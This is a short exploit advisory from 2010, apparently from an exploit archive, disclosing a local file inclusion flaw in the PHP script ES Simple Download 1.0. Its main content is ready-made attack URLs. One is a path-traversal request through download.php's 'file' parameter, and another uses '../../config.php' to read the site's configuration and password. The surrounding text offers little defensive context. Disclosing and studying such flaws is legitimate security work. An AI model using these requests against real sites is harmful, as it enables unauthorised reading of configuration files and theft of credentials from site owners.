ES Simple Download 1.0. Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ES Simple Download 1.0. Local File Inclusion Vulnerability
# Published : 2010-09-09
# Author : Kazza
# Previous Title : MOAUB #12 - eshtery CMS SQL Injection Vulnerability
# Next Title : AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection Vulnerability

 ----------------------------Information------------------------------------------------
+Name : ES Simple Download v 1.0. Local File Exclusion/LFI
+Autor : Kazza
+email : kazzamagic@list.ru
+Date   : 09.09.2010
+Script  : ES Simple Download v 1.0.
+Price : Freeware
+Language :PHP
+Discovered by Kazza
+Security Group : -GST-German Security Team-
+And all Friends Sites : http://md5cracker.tk - http://gulli.com - http://free-hack.com

----------------------------Vulnerability-----------------------------------------------
+Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip
+Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../*****
+Password Exploitable   : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php
-----------------------------------------------------------------------------------------